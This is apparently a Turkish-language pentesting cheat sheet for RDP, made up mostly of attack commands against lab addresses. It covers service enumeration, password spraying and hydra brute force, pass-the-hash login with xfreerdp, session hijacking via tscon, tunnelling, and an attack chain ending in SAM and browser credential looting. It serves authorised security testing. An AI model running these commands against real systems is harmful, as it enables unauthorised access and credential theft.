RDP Pentesting
RDP difficulty: orta
RDP, Windows yönetim erişiminin görsel yüzüdür. NLA, hesap kilidi, BlueKeep benzeri tarihsel CVE’ler ve oturum hijack senaryoları angajmanda sık geçer.
Ön koşullar
Section titled “Ön koşullar”- Hedef IP, domain/local kullanıcı listesi (opsiyonel)- Araçlar: nmap, nxc, hydra, xfreerdp, rdesktop, crackmapexec/nxcMetodoloji
Section titled “Metodoloji”-
Servis/sürüm, NLA ve sertifika bilgisini topla.
-
Kilitleme politikasına göre dikkatli sprey veya bilinen parola dene.
-
Bağlantı sonrası yerel admin mi, restricted admin / PtH mümkün mü bak.
-
Oturumlar, clipboard/drive redirect ve pivot için tüneli değerlendir.
Enumeration
Section titled “Enumeration”nmap -p3389 -sV --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 10.10.10.5nxc rdp 10.10.10.5nxc rdp 10.10.10.0/24rdp-sec-check.pl 10.10.10.5nmap -p3389 --script ssl-cert 10.10.10.5rdp-ntlm-info domain, hostname ve NLA ipuçları verir.
Kimlik doğrulama & spray
Section titled “Kimlik doğrulama & spray”nxc rdp 10.10.10.5 -u user -p 'Pass123!'nxc rdp 10.10.10.0/24 -u users.txt -p 'Sonbahar2025!' --continue-on-successhydra -L users.txt -P pass.txt rdp://10.10.10.5# domainnxc rdp 10.10.10.5 -d HEDEF -u user -p 'Pass123!'Spray öncesi SMB/LDAP ile lockout eşiğini öğren: Password Attacks.
Bağlantı
Section titled “Bağlantı”xfreerdp /u:user /p:'Pass123!' /v:10.10.10.5 /dynamic-resolutionxfreerdp /u:user /d:HEDEF /p:'Pass123!' /v:10.10.10.5 +clipboard /drive:share,/tmp/lootxfreerdp /u:admin /pth:NTLMHASH /v:10.10.10.5rdesktop -u user -p Pass123! 10.10.10.5Restricted Admin / PtH için Pass-the-Hash.
Zafiyet notları
Section titled “Zafiyet notları”nmap -p3389 --script rdp-vuln-ms12-020 10.10.10.5BlueKeep (CVE-2019-0708) — eski Windows; exploit gürültülü/riskli, RoE şartNLA kapalı → pre-auth bilgi / bazı saldırı yüzeyleri genişlerOturum & hijack (yüksek yetki)
Section titled “Oturum & hijack (yüksek yetki)”Yerel SYSTEM/admin olduktan sonra mevcut RDP oturumlarına geçiş (tscon vb.) kırmızı ekip senaryolarında görülür; üretimde kullanıcı oturumunu ele almak RoE’ye bağlıdır.
query userqwinsta# örnek kavram: sc oluşturup tscon ile session'a geçiş (yüksek yetki)ssh -L 3389:10.10.10.5:3389 user@bastionxfreerdp /u:user /p:'Pass123!' /v:127.0.0.1:3389# ligolo / chisel ile 3389 forward — bkz. pivotingKomut üreteci
Section titled “Komut üreteci”xfreerdp · bağlan
embedded toolxfreerdp /u:user /p:'Pass123!' /v:10.10.10.5 /dynamic-resolutionxfreerdp · bağlan
Section titled “xfreerdp · bağlan”Zincir
Section titled “Zincir”nxc rdp CIDR → geçerli user:pass → xfreerdp +clipboard /drive → loot SAM / browser → PtH lateral